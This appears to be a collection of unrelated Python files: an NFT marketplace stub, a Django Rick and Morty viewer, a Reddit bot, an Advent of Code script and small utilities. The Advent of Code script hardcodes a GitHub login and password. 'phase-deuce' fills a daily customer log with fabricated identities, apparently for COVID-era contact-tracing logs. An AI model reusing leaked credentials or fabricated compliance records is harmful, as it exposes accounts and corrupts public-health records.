base64\nimport time\nimport hashlib\nimport json\nfrom tqdm import tqdm\n\nfrom DB import DB\n\nimport sys\nsys.path.append('../../caller/')\nfrom utils import get_transaction_info\nfrom ST import ServiceToken\nfrom NFT import NFT\n\n\nFAKE_HASH = 'DCD0B2D32E9329D77AA642A55DC10469A876767493D2F60254A70E4DCD099202'\nFAKE_SERIAL_NUM = '10000001000000c3'\n\n\nclass Fantopia:\n def __init__(\n self,\n owner: dict,\n config: dict,\n sampleLoad: int = 20\n ):\n self.owner = {}\n self.ownerAddress = owner['address']\n self.owner[self.ownerAddress] = owner['secret']\n\n self.artists = {}\n self.users = {}\n\n self.tokenType = '10000001'\n self.nft = NFT(self.tokenType, owner, config) # NFT\n self.st = ServiceToken(owner, config) # [FAN]\n\n self.artist_fee = 0.05 # 5%\n self.platform_fee = 0.05 # 5%\n\n self.config = config\n\n self.DB = DB()\n _ = self.insertSamples(startNum=0, endNum=sampleLoad)\n\n def insertSamples(self, startNum=0, endNum=20):\n res = []\n\n print(\"Init: Upload Samples...\")\n for i in tqdm(range(startNum, endNum)):\n with open('./samples/sample' + str(i) + '.json', 'r') as f:\n sample = json.load(f)\n\n # index\n idx = self.DB._getPkIndex()\n sample['pk'] = idx\n\n sample['serial_num'] = FAKE_SERIAL_NUM\n\n # insert at DB\n self.DB.table[idx] = sample\n\n res.append(FAKE_HASH)\n\n return res\n\n # def change_owner(self):\n # pass\n\n def add_artist(self, artist: dict):\n self.artists[artist['address']] = artist['secret']\n\n def add_user(self, user: dict):\n self.users[user['address']] = user['secret']\n\n def is_artist(self, who: str):\n return who in self.artists\n\n def is_user(self, who: str):\n return who in self.users\n\n # DB\n\n # deprecated\n # def upload(self): pass\n\n def getImage(self, primaryKey: str):\n return self.DB.getImage(primaryKey)\n\n def getAllImages(self, startNum=0, endNum=100):\n return self.DB.getAllImages(startNum=startNum, endNum=endNum)\n\n def updateFavorite(self, primaryKey: str, favor=True):\n self.DB.updateFavorite(primaryKey, favor)\n\n def sellReset(self, startNum=0, endNum=100):\n self.DB.sellReset(startNum=startNum, endNum=endNum)\n\n def buy(\n self,\n pk: str,\n fromAddress: str,\n toAddress: str,\n tokenIndex: str = None,\n price: str = None\n ):\n res = []\n\n # update DB\n self.DB.table[pk]['is_selled'] = True\n self.DB.table[pk]['owner_addr'] = fromAddress\n\n res.append(FAKE_HASH)\n res.append(FAKE_HASH)\n res.append(FAKE_HASH)\n res.append(FAKE_HASH)\n\n # return txs\n return res\n\n\nif __name__ == 
\"__main__\":\n from pprint import pprint\n\n # Load info.\n with open('./users.json') as f:\n users = json.load(f)\n\n owner = users['Owner']\n artist = users['Artist']\n user_A = users['Customer_A']\n user_B = users['Customer_B']\n\n with open('./config.json') as f:\n config = json.load(f)\n\n # Set Fantopia service\n fantopia = Fantopia(owner, config)\n\n # Add artist\n fantopia.add_artist(artist)\n\n # Add user\n fantopia.add_user(user_A)\n fantopia.add_user(user_B)\n\n # Buy image\n res = fantopia.buy(\n pk=\"1\",\n fromAddress=user_B['address'],\n toAddress=user_A['address'],\n # tokenIndex='00000085',\n price='100'\n )\n pprint(res)\n\n # res = get_transaction_info(\n # server_url=config['server_url'],\n # service_api_key=config['service_api_key'],\n # service_api_secret=config['service_api_secret'],\n # txHash=\"DCD0B2D32E9329D77AA642A55DC10469A876767493D2F60254A70E4DCD099202\"\n # )\n # pprint(res)\n","sub_path":"example/server/fantopia_offline.py","file_name":"fantopia_offline.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"53649307","text":"#!/usr/bin/env python3\n#\n# phase-deuce\n# https://github.com/gregkrsak/phase-deuce\n#\n# Automatically populates a random daily log of customers for businesses offering table service.\n# Inspired by Phase 2 of WA State Governor Inslee's COVID-19 reopening plan. Of course, this is\n# to be used for testing purposes only!\n#\n# Copyright (c) 2020 Greg M. Krsak (greg.krsak@gmail.com)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\n# Required for io.StringIO()\nimport io\n# Required for .CSV file operations\nimport csv\n# Required for datetime.date()\nimport datetime\n# Required for zlib.adler32()\nimport zlib\n# Required for standard input/output routines\nimport sys\n# Required for atexit.register()\nimport atexit\n# Required for time.time()\nimport time\n# Required for checking keypresses\nimport tty\nimport termios\n# Required for random number generation\nimport random\n# Required for regular expressions\nimport re\n\n\n# Constants used for logging\nLOG_LEVEL_DEBUG = 1\nLOG_LEVEL_INFO = 2\nLOG_LEVEL_WARN = 3\nLOG_LEVEL_ERROR = 4\nLOG_LEVEL_SYSTEM = 5\nLOG_LEVEL_NONE = 100\n# Constants used for identity indexing\nID_NAME = 0\nID_EMAIL = 1\nID_PHONE = 2\n\n\ndef init(argv):\n \"\"\"\n This is the code block that is run on startup.\n :return: None\n \"\"\"\n app = Application()\n app.run()\n return\n\n\n##########################################################################################\n## Abstract classes ##\n##########################################################################################\n\n\nclass Model:\n \"\"\"\n An abstract MVC model.\n \"\"\"\n def __init__(self, view):\n self.view = view\n\n\nclass View:\n \"\"\"\n An abstract MVC view.\n \"\"\"\n def __init__(self, output_stream):\n self.buffer = io.StringIO()\n self.output = output_stream\n\n def waiting_output(self):\n result = self.buffer.getvalue()\n self.buffer.truncate(0)\n return result\n\n def update(self):\n \"\"\"\n Flush the output buffer.\n \"\"\"\n self.output.write(self.waiting_output())\n\n\nclass Controller:\n \"\"\"\n An abstract MVC controller.\n \"\"\"\n def __init__(self):\n self.model = Model()\n self.view = View()\n\n\n##########################################################################################\n## Main program classes ##\n##########################################################################################\n\n\nclass Application(Controller):\n \"\"\"\n The primary application code for the phase-deuce program.\n :return: None\n \"\"\"\n\n def __init__(self):\n atexit.register(self.shutdown)\n self.startup()\n pass\n\n def startup(self):\n \"\"\"\n Performs tasks for the Application instance that should happen on startup.\n \"\"\"\n # Initialize the internal logger (unrelated to writing to .CSV files)\n self.log = Log(LOG_LEVEL_INFO)\n\n result = True\n try:\n # Initialize the random number generator\n random.seed()\n # Initialize the primary MVC view\n self.view = Screen()\n # Initialize the primary MVC model\n self.model = Database(self.log)\n # Initialize the input stream\n self.input_stream = sys.stdin\n except:\n # Was an exception thrown?\n result = False\n\n self.log.system(result, 'Application startup')\n return\n\n def run(self):\n \"\"\"\n Runs the Application instance.\n \"\"\"\n the_user_still_wants_to_run_this_application = True\n self.log.info('Welcome to phase-deuce')\n self.log.info('Written by Greg M. Krsak (greg.krsak@gmail.com)')\n self.log.info('Contribute or file bugs here: https://github.com/gregkrsak/phase-deuce')\n self.log.info('Press SPACE to add a new log entry. 
Press Q or X to exit.')\n\n while the_user_still_wants_to_run_this_application:\n user_input = self.get_char()\n # Did the user press SPACEBAR?\n if user_input == ' ':\n # Add a new row to the database\n db_write_succeeded = self.model.create_row()\n self.log.system(db_write_succeeded, 'Log entry written')\n # Did the user press the Q or X key?\n elif user_input.upper() == 'Q' or user_input.upper() == 'X':\n # Exit\n the_user_still_wants_to_run_this_application = False\n\n return\n\n def shutdown(self):\n \"\"\"\n Performs tasks for the Application instance that should happen on shutdown.\n \"\"\"\n result = True\n try:\n pass # Do nothing\n except:\n # Was an exception thrown?\n result = False\n self.log.system(result, 'Application shutdown')\n return\n\n def get_char(self):\n \"\"\"\n Gets a single keypress\n Ref: https://gist.github.com/jasonrdsouza/1901709\n \"\"\"\n file_descriptor = self.input_stream.fileno()\n old_settings = termios.tcgetattr(file_descriptor)\n try:\n tty.setraw(self.input_stream.fileno())\n result = sys.stdin.read(1)\n finally:\n termios.tcsetattr(file_descriptor, termios.TCSADRAIN, old_settings)\n return result\n\n\nclass Database(Model):\n \"\"\"\n This class performs database operations on .CSV files.\n The filename format is: phase-deuce-log_YYYY-MM-DD.csv\n The row format is: unix_time,full_name,email_address,phone_number,checksum\n \"\"\"\n\n empty_string = ''\n delimiter_string = ','\n quote_string = '\"'\n\n encoding = 'utf-8'\n\n filename_prefix = 'phase-deuce-log_'\n filename_suffix = '.csv'\n\n column_unix_time = 0\n column_full_name = 1\n column_email_address = 2\n column_phone_number = 3\n column_checksum = 4\n\n def __init__(self, log):\n super().__init__(log)\n\n def todays_filename(self):\n \"\"\"\n Calculates today's filename string using the ISO 8601 format date.\n :return: A string with the format \"phase-deuce-log_YYYY-MM-DD.csv\".\n \"\"\"\n date_string = datetime.date.today().isoformat()\n result = Database.filename_prefix + date_string + Database.filename_suffix\n return result\n\n def validate(self, filename=None):\n \"\"\"\n Validates today's .CSV file.\n :return: True or False, depending on if the validation was successful.\n \"\"\"\n # Figure out the filaname\n if not filename:\n filename = self.todays_filename()\n # Default to success\n result = True\n try:\n with open(filename, 'r', newline=Database.empty_string) as file:\n db = csv.reader(file,\n delimiter=Database.delimiter_string,\n quotechar=Database.quote_string)\n # Iterate over each row\n for row in db:\n # Create a string from the joined list items of this row\n row_string = Database.delimiter_string.join(row)\n # Create the string to validate via checksum\n string_to_validate = row[Database.column_unix_time] \\\n + row[Database.column_full_name] \\\n + row[Database.column_email_address] \\\n + row[Database.column_phone_number]\n # Create a binary encoded representation of that same string\n bytes_to_validate = string_to_validate.encode(encoding=Database.encoding)\n # Calculate checksum and read the existing checksum\n fresh_checksum = zlib.adler32(bytes_to_validate)\n existing_checksum = int(row[Database.column_checksum])\n # Fail if any row's checksum does not match\n if (fresh_checksum != existing_checksum):\n result = False\n except:\n # Was an exception thrown?\n result = False\n return result\n\n\n def create_row(self):\n \"\"\"\n Creates a database row that's populated with fake personally-identifying data.\n Note that the columns 'unix_time' and 'checksum' will be 
valid.\n :return: True or False, depending on if the write is considered successful.\n \"\"\"\n filename = self.todays_filename()\n # Default to success\n result = True\n try:\n with open(filename, 'a', newline=Database.empty_string) as file:\n db = csv.writer(file,\n delimiter=Database.delimiter_string,\n quotechar=Database.quote_string)\n # Get the current UNIX time\n unix_time = int(time.time())\n # Create the fake person\n identity = PersonGenerator.new_identity()\n # Prepare the data to be validated later via checksum\n string_to_validate = str(unix_time) \\\n + identity[ID_NAME] \\\n + identity[ID_EMAIL] \\\n + identity[ID_PHONE]\n bytes_to_validate = string_to_validate.encode(encoding=Database.encoding)\n # Calculate the checksum\n checksum = zlib.adler32(bytes_to_validate)\n # Write the row data to the .CSV file\n row = [unix_time, identity[ID_NAME], identity[ID_EMAIL], identity[ID_PHONE], checksum]\n db.writerow(row)\n # Re-validate the database after the write\n result = self.validate(filename)\n except:\n # Was an exception thrown?\n result = False\n return result\n\n\nclass Screen(View):\n \"\"\"\n Represents the stdout stream.\n \"\"\"\n\n eol = '\\n'\n\n def __init__(self):\n super().__init__(sys.stdout)\n\n\nclass Log(Screen):\n \"\"\"\n This class logs application events to the screen.\n \"\"\"\n\n eol = Screen.eol\n\n prefix_braces = ['[ ', ' ]']\n prefix_separator = ' '\n system_ok_string = 'OK'\n system_fail_string = 'FAIL'\n debug_string = 'DEBUG'\n info_string = 'INFO'\n warn_string = 'WARN'\n error_string = 'ERROR'\n\n def __init__(self, level):\n super().__init__()\n self.level = level\n\n def system(self, status, message):\n if self.level <= LOG_LEVEL_SYSTEM:\n if status == True:\n self.__printlog(self.system_ok_string, message)\n else:\n self.__printlog(self.system_fail_string, message)\n\n def debug(self, message):\n if self.level <= LOG_LEVEL_DEBUG:\n self.__printlog(self.debug_string, message)\n\n def info(self, message):\n if self.level <= LOG_LEVEL_INFO:\n self.__printlog(self.info_string, message)\n\n def warn(self, message):\n if self.level <= LOG_LEVEL_WARN:\n self.__printlog(self.warn_string, message)\n\n def error(self, message):\n if self.level <= LOG_LEVEL_ERROR:\n self.__printlog(self.error_string, message)\n\n def __printlog(self, prefix_string, message):\n self.buffer.write(self.prefix_braces[0] + prefix_string + self.prefix_braces[1] \\\n + self.prefix_separator + message + Log.eol)\n self.update()\n\n\nclass PersonGenerator():\n \"\"\"\n This is a static class used to generate pseudo-random \"personal info\".\n I was pretty tired when I wrote this, so forigve me if it looks like a giant hack.\n \"\"\"\n\n __first_names = ['Robert', 'Shawn', 'William', 'James', 'Oliver', 'Benjamin', \\\n 'Elijah', 'Lucas', 'Dick', 'Logan', 'Alexander', 'Ethan', \\\n 'Jacob', 'Michael', 'Daniel', 'Henry', 'Jackson', 'Sebastian', \\\n 'Peter', 'Matthew', 'Samuel', 'David', 'Joseph', 'Carter', \\\n 'Mary', 'Patricia', 'Linda', 'Barbara', 'Elizabeth', 'Jennifer', \\\n 'Maria', 'Susan', 'Margaret', 'Dorothy', 'Lisa', 'Nancy', \\\n 'Karen', 'Betty', 'Helen', 'Sandra', 'Donna', 'Carol', \\\n 'Ruth', 'Sharon', 'Michelle', 'Laura', 'Sarah', 'Kimberly']\n __last_names = ['Smith', 'Johnson', 'Williams', 'Brown', 'Jones', 'Miller', \\\n 'Davis', 'Wilson', 'Anderson', 'Taylor', 'Moore', 'Thomas', \\\n 'Jackson', 'White', 'Harris', 'Martin', 'Thompson', 'Garcia', \\\n 'Martinez', 'Robinson', 'Clark', 'Rodriguez', 'Lewis', 'Lee', \\\n 'Walker', 'Hall', 'Allen', 'Young', 
'Hernandez', 'King', \\\n 'Wang', 'Devi', 'Zhang', 'Li', 'Liu', 'Singh', \\\n 'Yang', 'Kumar', 'Wu', 'Xu']\n __email_domains = ['gmail.com', 'outlook.com', 'yahoo.com', 'icloud.com', 'aol.com', 'mail.com']\n\n def new_identity():\n # Initialize an empty list to store the result\n result = ['', '', '']\n # Calculate the length of the name lists\n first_names_len = len(PersonGenerator.__first_names)\n last_names_len = len(PersonGenerator.__last_names)\n # Choose a random first and last name\n first_names_index = random.randrange(0, first_names_len)\n last_names_index = random.randrange(0, last_names_len)\n first_name = PersonGenerator.__first_names[first_names_index]\n last_name = PersonGenerator.__last_names[last_names_index]\n # Build the new name\n result[ID_NAME] = first_name + ' ' + last_name\n # Build the new email address\n result[ID_EMAIL] = PersonGenerator.__generate_email(first_name, last_name)\n # Build the new phone number\n result[ID_PHONE] = PersonGenerator.__generate_phone_number()\n\n return result\n\n def __generate_email(first_name, last_name):\n # Email style constants\n STYLE_FIRST_DOT_LAST = 0\n STYLE_LAST_DOT_FIRST = 1\n STYLE_FIRST_LAST = 2\n STYLE_F_LAST = 3\n # Select a random email style\n style = random.randrange(STYLE_FIRST_DOT_LAST, STYLE_F_LAST + 1)\n # Make the first and last names lowercase\n first_name = first_name.lower()\n last_name = last_name.lower()\n # Calculate the length of the email domain list\n email_domains_len = len(PersonGenerator.__email_domains)\n # Choose a random email domain\n email_domains_index = random.randrange(0, email_domains_len)\n domain_name = PersonGenerator.__email_domains[email_domains_index]\n # Format the email username\n if style == STYLE_FIRST_DOT_LAST:\n username = first_name + '.' + last_name\n elif style == STYLE_LAST_DOT_FIRST:\n username = last_name + '.' 
+ first_name\n elif style == STYLE_FIRST_LAST:\n username = first_name + last_name\n elif style == STYLE_F_LAST:\n username = first_name[0] + last_name\n # Return the finished email address\n result = username + '@' + domain_name\n return result\n\n def __generate_phone_number():\n # This regex validates a 10-digit telephone number\n # Ref: https://www.oreilly.com/library/view/regular-expressions-cookbook/9781449327453/ch04s02.html\n nanp_regex = re.compile('^\\(?([2-9][0-8][0-9])\\)?[-.]?([2-9][0-9]{2})[-.]?([0-9]{4})$')\n # Generate random phone numbers until we get one that's valid according to the NANP\n phone_number_is_invalid = True\n while phone_number_is_invalid:\n result = str(PersonGenerator.__generate_npa()) + '-' \\\n + str(PersonGenerator.__generate_nxx()) + '-' \\\n + str(PersonGenerator.__generate_xxxx())\n if nanp_regex.match(result):\n phone_number_is_invalid = False\n return result\n\n def __generate_npa():\n result = random.randrange(0, 1000)\n return result\n\n def __generate_nxx():\n result = random.randrange(0, 1000)\n return result\n\n def __generate_xxxx():\n result = random.randrange(0, 10000)\n return result\n\n\n##########################################################################################\n## Bootstrap ##\n##########################################################################################\n\n\n# Bootstraps the application via the init() function\nif __name__ == '__main__':\n argv = ''\n try:\n argv = sys.argv[1]\n except:\n pass\n init(argv)\n\n# End of phase-deuce.py\n","sub_path":"phase-deuce.py","file_name":"phase-deuce.py","file_ext":"py","file_size_in_byte":17692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"527858079","text":"from dcs.helicopters import *\nfrom dcs.planes import *\nfrom dcs.ships import *\nfrom dcs.vehicles import *\n\nfrom pydcs_extensions.a4ec.a4ec import A_4E_C\nfrom pydcs_extensions.mb339.mb339 import MB_339PAN\n\nBLUEFOR_COLDWAR_MODS = {\n \"country\": \"USA\",\n \"side\": \"blue\",\n \"units\": [\n\n F_14B,\n F_4E,\n F_5E_3,\n A_10A,\n AJS37,\n A_4E_C,\n MB_339PAN,\n\n KC_135,\n KC130,\n C_130,\n E_3A,\n\n UH_1H,\n SA342M,\n SA342L,\n\n Armor.MBT_M60A3_Patton,\n Armor.APC_M113,\n\n Unarmed.Transport_M818,\n Infantry.Infantry_M4,\n Infantry.Soldier_M249,\n\n AirDefence.SAM_Hawk_PCP,\n AirDefence.SAM_Chaparral_M48,\n\n CVN_74_John_C__Stennis,\n LHA_1_Tarawa,\n Armed_speedboat,\n ], \"shorad\": [\n AirDefence.AAA_Vulcan_M163,\n ], \"aircraft_carrier\": [\n CVN_74_John_C__Stennis,\n ], \"helicopter_carrier\": [\n LHA_1_Tarawa,\n ], \"cruiser\": [\n Ticonderoga_class,\n ], \"carrier_names\": [\n \"CVN-71 Theodore Roosevelt\",\n \"CVN-72 Abraham Lincoln\",\n \"CVN-73 George Washington\",\n \"CVN-74 John C. 
Stennis\",\n ], \"lhanames\": [\n \"LHA-1 Tarawa\",\n \"LHA-2 Saipan\",\n \"LHA-3 Belleau Wood\",\n \"LHA-4 Nassau\",\n \"LHA-5 Peleliu\"\n ], \"boat\": [\n ], \"requirements\": {\n \"MB-339A\": \"http://www.freccetricolorivirtuali.net/\",\n \"Community A-4E\": \"https://heclak.github.io/community-a4e-c/\",\n }, \"has_jtac\": True\n}\n","sub_path":"game/factions/bluefor_coldwar_mods.py","file_name":"bluefor_coldwar_mods.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"92356022","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport requests\n\n# Create your views here.\ndef home_view(request):\n response = requests.get('https://rickandmortyapi.com/api/episode')\n data = response.json()\n url_next = data[\"info\"][\"next\"]\n while url_next != \"\":\n response2 = requests.get(url_next)\n data2 = response2.json()\n data[\"results\"].extend(data2[\"results\"])\n url_next = data2[\"info\"][\"next\"]\n return render(request, \"home.html\", data)\n\n\ndef capitulo_view(request, num = 1):\n response = requests.get(f'https://rickandmortyapi.com/api/episode/{num}')\n data = response.json()\n links = data[\"characters\"]\n characters = []\n for link in links:\n characters.append(int(link.split('/')[-1]))\n response2 = requests.get(f'https://rickandmortyapi.com/api/character/{characters}')\n data2 = response2.json()\n lista_personajes = []\n for perso in data2:\n personaje = dict()\n personaje[\"id\"] = perso[\"id\"]\n personaje[\"nombre\"] = perso[\"name\"]\n lista_personajes.append(personaje)\n data[\"lista_personajes\"] = lista_personajes\n return render(request, \"capitulo.html\", data)\n\ndef personaje_view(request, num = 1):\n response = requests.get(f'https://rickandmortyapi.com/api/character/{num}')\n data = response.json()\n links = data[\"episode\"]\n capitulos = []\n for link in links:\n capitulos.append(int(link.split('/')[-1]))\n response2 = requests.get(f'https://rickandmortyapi.com/api/episode/{capitulos}')\n data2 = response2.json()\n lista_capitulos = []\n for cap in data2:\n capitulo = dict()\n capitulo[\"id\"] = cap[\"id\"]\n capitulo[\"nombre\"] = cap[\"name\"]\n lista_capitulos.append(capitulo)\n data[\"lista_capitulos\"] = lista_capitulos\n\n id_personaje = data[\"location\"][\"url\"].split('/')[-1]\n data[\"location\"][\"id\"]= id_personaje\n\n return render(request, \"personaje.html\", data)\n\ndef lugar_view(request, num = 1):\n response = requests.get(f'https://rickandmortyapi.com/api/location/{num}')\n data = response.json()\n links = data[\"residents\"]\n characters = []\n for link in links:\n characters.append(int(link.split('/')[-1]))\n response2 = requests.get(f'https://rickandmortyapi.com/api/character/{characters}')\n data2 = response2.json()\n lista_personajes = []\n for perso in data2:\n personaje = dict()\n personaje[\"id\"] = perso[\"id\"]\n personaje[\"nombre\"] = perso[\"name\"]\n lista_personajes.append(personaje)\n data[\"lista_personajes\"] = lista_personajes\n return render(request, \"lugar.html\", data)\n\ndef busqueda_view(request):\n if request.method == 'GET': # If the form is submitted\n search_query = request.GET.get('search_box', None)\n response_personajes = requests.get(f'https://rickandmortyapi.com/api/character/?name={search_query}')\n data_personajes = response_personajes.json()\n response_lugares = requests.get(f'https://rickandmortyapi.com/api/location/?name={search_query}')\n data_lugares = 
response_lugares.json()\n response_capitulos = requests.get(f'https://rickandmortyapi.com/api/episode/?name={search_query}')\n data_capitulos = response_capitulos.json()\n data = dict()\n if \"info\" in data_personajes.keys():\n url_next_personajes = data_personajes[\"info\"][\"next\"]\n # \"next\" is None (null) on the last page of results\n while url_next_personajes:\n response2 = requests.get(url_next_personajes)\n data2 = response2.json()\n data_personajes[\"results\"].extend(data2[\"results\"])\n url_next_personajes = data2[\"info\"][\"next\"]\n data[\"results_personajes\"] = data_personajes[\"results\"]\n\n if \"info\" in data_lugares.keys():\n url_next_lugares = data_lugares[\"info\"][\"next\"]\n while url_next_lugares:\n response2 = requests.get(url_next_lugares)\n data2 = response2.json()\n data_lugares[\"results\"].extend(data2[\"results\"])\n url_next_lugares = data2[\"info\"][\"next\"]\n data[\"results_lugares\"] = data_lugares[\"results\"]\n\n if \"info\" in data_capitulos.keys():\n url_next_capitulos = data_capitulos[\"info\"][\"next\"]\n while url_next_capitulos:\n response2 = requests.get(url_next_capitulos)\n data2 = response2.json()\n data_capitulos[\"results\"].extend(data2[\"results\"])\n url_next_capitulos = data2[\"info\"][\"next\"]\n data[\"results_capitulos\"] = data_capitulos[\"results\"]\n return render(request, \"busqueda.html\", data)\n","sub_path":"t1_django_project/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"614512493","text":"from collections import Counter\n\nfrom praw import Reddit\nfrom psaw import PushshiftAPI\n\n\nclass Activity:\n def __init__(self, reddit: Reddit):\n self.reddit = reddit\n self.api = PushshiftAPI(reddit)\n\n def combined(self, username: str, limit: int = 5) -> Counter:\n activity = self.api.redditor_subreddit_activity(username)\n counts = activity.get(\"comment\", Counter([]))\n counts.update(activity.get(\"submission\", Counter([])))\n return counts.most_common(limit)\n\n def combined_formatted(self, username: str, limit: int = 5) -> str:\n data = self.combined(username, limit)\n output = [\n f\"Here are the top {limit} most active subreddits for /u/{username}:\",\n \"\",\n \"Subreddit | Total activity\",\n \"---|:---:\",\n ]\n try:\n output.extend([f\"/r/{subreddit} | {count:,}\" for subreddit, count in data])\n except ValueError:\n output.extend([f\"/r/{subreddit} | {count}\" for subreddit, count in data])\n output.extend(\n [\" \", \"> I am a bot, this action was performed automatically\"]\n )\n return \"\\n\".join(output)\n","sub_path":"tattle_bot/model/Activity.py","file_name":"Activity.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82157781","text":"from selenium import webdriver\nfrom collections import Counter\nimport itertools\nimport math\nimport os.path\n\ndef getPuzzleinput(day):\n\n if os.path.isfile(\"input_Day\"+str(day)+'.txt'):\n input = []\n file = open(\"input_Day\" + str(day)+'.txt', 'r')\n for i in file:\n i=i.strip()\n input.append(i)\n file.close()\n return input\n\n else:\n\n driver = webdriver.Chrome()\n driver.get('https://adventofcode.com/2018/day/'+str(day))\n # url=\"https://adventofcode.com/\"\n # webbrowser.open(url,new=2)\n\n elem1 = driver.find_element_by_link_text('[GitHub]')\n elem1.click()\n\n driver.find_element_by_id('login_field').send_keys('Rostbratwurst')\n 
driver.find_element_by_id('password').send_keys('Puller100')\n driver.find_element_by_name('commit').click()\n\n elem1 = driver.find_element_by_link_text('get your puzzle input')\n elem1.click()\n\n driver.switch_to.window(driver.window_handles[1])\n inp = driver.find_element_by_tag_name(\"body\")\n dayInput=inp.text\n driver.quit()\n\n with open('input_day'+str(day)+'.txt', 'w') as f:\n for line in dayInput:\n f.write(str(line))\n # f.write(\"\\n\")\n f.close()\n print(dayInput)\n return [i for i in dayInput.split(\"\\n\")]\n\ndef lettercount(list_of_strings):\n\n twotimes=int(0)\n threetimes=int(0)\n\n for string in list_of_strings:\n counter = Counter(string)\n counter_counter=Counter(counter.values())\n\n if counter_counter[2]>=1:\n twotimes+=1\n\n if counter_counter[3]>=1:\n threetimes+=1\n\n\n return twotimes,threetimes\n\ndef checksum(args):\n result=1\n for i in args:\n result=result*i\n return result\n\ndef similarity(list):\n\n for st1,st2 in itertools.combinations(list,2):\n diff=0\n for c1,c2 in zip(st1,st2):\n if c1 != c2:\n diff+=1\n diffletter=[c1,c2]\n if diff==1:\n print(st1)\n print(st2)\n print(diffletter)\n\n\nif __name__==\"__main__\":\n\n var=getPuzzleinput(2)\n resultsum=checksum(lettercount(var))\n part2=similarity(var)\n","sub_path":"Day2.py","file_name":"Day2.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"86168517","text":"import datetime as dt\n\n\"\"\"\nFind the date that is n business days from today. \nUse n < 0 to find past business days and n > 0 to find future business days. \n\"\"\"\n\n\ndef holiday(date):\n \"\"\"Determines if the date is a holiday or not.\"\"\"\n # input: date object\n # output: boolean (holiday = True) \n \n holidays = [] # array of holidays for the organization. \n if date in holidays:\n return True\n return False \n\n\ndef business_day(date):\n \"\"\"Determines if the date is a business day or not.\"\"\" \n # input: date object\n # output: boolean (business day = True)\n # Sunday = 0, Monday = 1, ... 
, Saturday = 6\n \n day_of_week = (int(date.weekday()) + 1) % 7\n if day_of_week not in [0, 6] and not holiday(date):\n return True \n return False \n \n\ndef n_business_days(date, n=-2):\n \"\"\"Returns the date that is n business days from today.\"\"\"\n # input: date object for today's date\n # input: integer representing the number of business days before or after the date.\n # output: date object for the date that is n business days from the input date.\n \n business_days = 0\n calendar_days = 0 \n\n if n != 0:\n step = int(n/abs(n))\n while business_days != abs(n):\n calendar_days = calendar_days + step\n if business_day(date + dt.timedelta(calendar_days)):\n business_days = business_days + 1\n return date + dt.timedelta(calendar_days)\n return date\n\n\ndef main():\n today = dt.date.today()\n print(today)\n n = int(input('Number of business days?:'))\n print(n_business_days(today, n))\n print()\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"n_business_days.py","file_name":"n_business_days.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"8343417","text":"import os\n\nfrom sparkpost.base import Resource\n\n\nclass Webhooks(Resource):\n key = \"webhooks\"\n\n def list(self, **kwargs):\n results = self.request('GET', self.uri, **kwargs)\n return results\n\n\napi_key = os.environ.get('SPARKPOST_API_KEY', None)\nwebhooks = Webhooks('https://api.sparkpost.com/api/v1', api_key)\n\n# returns a list of webhooks for your account\nprint(webhooks.list())\n","sub_path":"examples/base_resource.py","file_name":"base_resource.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212355935","text":"def letter_change(string):\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n new_string = \"\"\n for char in string:\n if char in alphabet:\n if char == 'z':\n char = 'A'\n new_string += char\n else:\n # look the character up in the alphabet, not in the input string\n index = alphabet.find(char)\n index += 1\n char = alphabet[index] \n if char in \"aeiou\":\n char = char.upper()\n new_string += char\n else:\n new_string += char\n \n print(new_string)\n\nletter_change('abcd')\nletter_change('this is a beautiful day')\nletter_change(\"abcdefghijklmnopqrstuvwxyz\")\n\n# alternative solution\ndef letter_change_2(string): \n newString = \"\"\n \n for char in string:\n if char.isalpha():\n if char.lower() == 'z':\n char = 'a'\n else:\n char = chr(ord(char) + 1)\n\n if char in 'aeiou':\n char = char.upper()\n \n newString = newString + char\n\n return newString\n \nprint(letter_change_2('abcd'))\nprint(letter_change_2('this is a beautiful day'))\nprint(letter_change_2(\"abcdefghijklmnopqrstuvwxyz\"))\n","sub_path":"old/letter_change.py","file_name":"letter_change.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330205176","text":"from typing import Any\nfrom typing import Callable\nfrom typing import Mapping\nfrom typing import Optional\nfrom typing import TypeVar\n\nfrom . import engine as engine\nfrom .base import StartableContext as StartableContext\nfrom .engine import AsyncEngine as 